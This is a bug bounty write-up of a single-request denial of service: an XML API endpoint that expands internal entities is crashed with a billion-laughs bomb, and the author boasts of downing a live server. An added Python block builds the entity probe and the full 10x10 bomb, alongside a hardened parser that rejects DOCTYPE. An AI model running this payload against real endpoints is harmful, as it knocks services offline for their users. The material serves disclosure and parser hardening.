[Bug Bounty Writeups] Exploiting Insecure XML Parsers to perform Single-Request Denial-of-Service

Ahmed ElTijani
Published in SUDOROOT
4 min read · Sep 8, 2020

Hello @everyone 😅
Here is a writeup for a bug I reported to a bug bounty program.

The bug targets the XML parser behind an API endpoint: a single request exhausts the server's resources and leads to a complete denial of service.

During the recon phase I found an endpoint that responds with XML-formatted content 👇 The response looked interesting, so I decided to dig deeper and test this endpoint 😈

As the response said, my request was missing some parameters. I tried different techniques to find them: brute-forcing GET and POST parameter names 😣, and copying the XML tag names from the response and sending them as GET/POST parameters (?transactionID, ?pTxId), but nothing was found 😢. A few hours later I realized that the endpoint expects an XML-formatted request body 😁 so:

1. In Burp Suite Repeater, right-click and change the request method from

“GET /endpoint HTTP/1.1”

to

“POST /endpoint HTTP/1.1”

2. Change the Content-Type header to text/xml.

3. Copy the response body and paste it into the request body. 😈

My request now looked like this:

I sent the request and got the same response: “Missing some parameters” 🤫

Then I noticed the XML tag <initResponse>.

I changed:

<initResponse>

to

<initRequest>

and sent the request 😈. Guess what? I found the missing link 😎

The response was:

As you can see, the value of the request's <transactionID> was reflected in the response, so the backend is parsing my XML. Let's see whether this parser processes entities: declare an internal entity in an inline DOCTYPE and reference it inside <transactionID>.

Request:

YES 😄, the parser expanded my entity and echoed it back.

I tried to escalate this to XXE (and from there to RCE) by declaring external entities with SYSTEM and PUBLIC identifiers and through a local DTD, but none of it was successful. So I went after the internal entity expansion instead.

XML Bomb 💣 a.k.a. Billion Laughs attack:

It is an attack that exploits XML parsers to run the server out of memory and CPU. The attacker defines ten entities, each consisting of ten copies of the previous one, and a document that contains a single reference to the largest entity; expanding that reference produces one billion (10^9) copies of the first entity (Sullivan, 2009). Because every entity is internal, the attack works even where external entity resolution is disabled: the only effective defenses are to reject DOCTYPE/entity declarations in untrusted input or to cap entity expansion in the parser.

In the end, the lol9 entity expands to a billion copies of the first entity “😂”, which is why it is called billion laughs 😂
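The entity probe, the general form of the bomb, and the check the fix needs, as an added example (this is not code from the writeup; the element names <initRequest> and <transactionID> are taken from the post, while the probe marker, the levels/fanout parameters and the DTD-rejecting parser are this example's own). It generalizes the post's payload: levels and fanout are parameters, so the same builder produces a harmless 3×3 instance for testing and the 10×10 bomb the post describes.

```python
"""Added example: entity probe, parametrised billion-laughs payload, and a
hardened parser that refuses any DOCTYPE before an entity can be declared.
Element names come from the writeup; everything else is this example's own."""
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat

ROOT, FIELD = "initRequest", "transactionID"  # element names taken from the post


def probe_document(marker="probe-reflected"):
    """Entity-expansion probe: one internal entity referenced inside <transactionID>.
    If the reply echoes MARKER, the backend expands entities."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE {ROOT} [<!ENTITY probe "{marker}">]>\n'
        f"<{ROOT}><{FIELD}>&probe;</{FIELD}></{ROOT}>"
    )


def billion_laughs(levels=10, fanout=10, seed="lol"):
    """General form of the bomb: lol0 = SEED, lol_i = FANOUT copies of lol_(i-1),
    and the document references only the last entity. The post's payload is
    levels=10, fanout=10 (10**9 copies of SEED from a request of ~1 KB)."""
    decls = [f'<!ENTITY lol0 "{seed}">']
    for i in range(1, levels):
        decls.append(f'<!ENTITY lol{i} "' + f"&lol{i - 1};" * fanout + '">')
    head = f'<?xml version="1.0"?>\n<!DOCTYPE {ROOT} [\n'
    tail = f"\n]>\n<{ROOT}><{FIELD}>&lol{levels - 1};</{FIELD}></{ROOT}>"
    return head + "\n".join(decls) + tail


def expanded_bytes(levels=10, fanout=10, seed="lol"):
    """Bytes the parser must materialise when it expands the root reference."""
    return len(seed.encode()) * fanout ** (levels - 1)


def naive_transaction_id(body):
    """What the vulnerable endpoint effectively did: parse with entity expansion
    enabled and echo <transactionID> back. Only ever feed this small instances."""
    return ET.fromstring(body).findtext(FIELD)


class DTDForbidden(ValueError):
    """Raised when untrusted XML carries a DOCTYPE (and therefore may declare entities)."""


def hardened_transaction_id(body):
    """Hardened version: abort the moment expat reports a DOCTYPE, before any
    entity is declared or expanded, so nothing is ever inflated in memory.
    This is the same hook defusedxml uses, written against stdlib expat."""
    parser = expat.ParserCreate()
    path, chunks = [], []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DTDForbidden(f"DOCTYPE for <{name}> is not accepted in requests")

    def on_start(name, attrs):
        path.append(name)

    def on_end(name):
        path.pop()

    def on_chars(data):  # expat may deliver one text node in several chunks
        if path and path[-1] == FIELD:
            chunks.append(data)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = on_chars
    parser.Parse(body, True)
    return "".join(chunks) or None


if __name__ == "__main__":
    small = billion_laughs(levels=3, fanout=3)  # 9 copies of "lol": safe to parse
    print("3x3 instance expands to:", naive_transaction_id(small))
    print("10x10 payload would expand to", expanded_bytes(), "bytes")
    try:
        hardened_transaction_id(probe_document())
    except DTDForbidden as err:
        print("hardened parser refused it:", err)
```

The check has to happen inside the parser (or before any parsing at all): a byte-level search for `<!DOCTYPE` in the raw body is weaker, since a UTF-16 encoded document slips past it while the parser still decodes it. If you would rather not wire up expat handlers yourself, defusedxml's `fromstring` raises on the same DOCTYPE/entity events; libxml2-based parsers (lxml) abort exponential expansion by default unless `huge_tree` is enabled.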

Let's kill the server “api.redacted.com” 👿

It took 41.5 seconds for the server to reply with “502 Bad Gateway”.

Try to repeat the request? No, because it was already down 😈

The bug was reported to the program, and it didn't take them long to bring the server back up. They fixed the bug and rewarded me with $375.

References:

Sullivan, Bryan (November 2009). “XML Denial of Service Attacks and Defenses”. MSDN Magazine, Microsoft Corporation.

Thanks,

Ahmed ElTijani
